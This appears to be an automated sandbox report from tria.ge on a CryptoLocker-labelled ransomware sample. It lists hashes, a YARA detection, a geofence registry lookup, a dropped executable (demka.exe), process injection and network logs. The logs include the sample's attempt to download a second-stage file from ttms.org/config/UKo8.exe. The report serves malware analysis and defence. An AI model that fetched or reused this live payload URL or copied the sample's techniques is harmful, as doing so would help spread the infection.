Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17/04/2024, 05:30 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
Resource
win10v2004-20240412-en
General
-
Target
2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe
-
Size
33KB
-
MD5
1e098a91f5deba98f586a01e2b2206ba
-
SHA1
5063a0c4f10761292b4eb8bf8def94ff00034b2f
-
SHA256
0bc398c17feb0dc8a948419b48eb013cc133e2c14bd83e27974ae394f555f377
-
SHA512
bc69df6db67952696e1ba387cace5fd3959003650b2b9279e542f5eafe30821564b7b32c8da18963344f3b53dce22d1e681d91cb3675412b0e4fda2dc43f9116
-
SSDEEP
384:bAvMaNGh4z7CG3POOvbRSLoF/F0QU5XYFnufc/zzo6cuM9gxrW:bAvJCYOOvbRPDEgXRcuM9gxa
Malware Config
Signatures
-
Detection of CryptoLocker Variants 1 IoCs
resource yara_rule behavioral2/files/0x000300000001e9b1-12.dat CryptoLocker_rule2 -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation demka.exe -
Executes dropped EXE 1 IoCs
pid Process 1408 demka.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4788 wrote to memory of 1408 4788 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe 87 PID 4788 wrote to memory of 1408 4788 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe 87 PID 4788 wrote to memory of 1408 4788 2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-17_1e098a91f5deba98f586a01e2b2206ba_cryptolocker.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\demka.exe"C:\Users\Admin\AppData\Local\Temp\demka.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1408
-
Network
-
Remote address:8.8.8.8:53Request0.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request82.90.14.23.in-addr.arpaIN PTRResponse82.90.14.23.in-addr.arpaIN PTRa23-14-90-82deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestttms.orgIN AResponsettms.orgIN A35.215.114.222
-
Remote address:35.215.114.222:443RequestGET /config/UKo8.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: ttms.org
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Date: Wed, 17 Apr 2024 05:31:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Httpd: 1
Host-Header: 8441280b0c35cbc1147f8ba998a563a7
X-Proxy-Cache: HIT
-
Remote address:8.8.8.8:53Request9.228.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request222.114.215.35.in-addr.arpaIN PTRResponse222.114.215.35.in-addr.arpaIN PTR22211421535bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Request11.97.55.23.in-addr.arpaIN PTRResponse11.97.55.23.in-addr.arpaIN PTRa23-55-97-11deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request21.114.53.23.in-addr.arpaIN PTRResponse21.114.53.23.in-addr.arpaIN PTRa23-53-114-21deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request24.139.73.23.in-addr.arpaIN PTRResponse24.139.73.23.in-addr.arpaIN PTRa23-73-139-24deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
3.8kB 90.7kB 73 69
HTTP Request
GET https://ttms.org/config/UKo8.exeHTTP Response
404
-
71 B 157 B 1 1
DNS Request
0.159.190.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
82.90.14.23.in-addr.arpa
-
54 B 70 B 1 1
DNS Request
ttms.org
DNS Response
35.215.114.222
-
70 B 156 B 1 1
DNS Request
9.228.82.20.in-addr.arpa
-
73 B 126 B 1 1
DNS Request
222.114.215.35.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
11.97.55.23.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
21.114.53.23.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
24.139.73.23.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.227.111.52.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5c412382b8f543f3d11ae17fd6e59b169
SHA1fc00fb65d8c790fe093beb011ec0e58715c62895
SHA256a0f7234c8e146726a9af0caaf249364badf34eefb5241f8cee4737cc74ab10fc
SHA51289bf44da50a69b8a21568a1a80143b01db2fdcc5c742d5135359b12a12a0075826d47dd3a9d04419acf8bad41cef12cb9fa9b5ffabe2e45d6f5c646a31bf17a4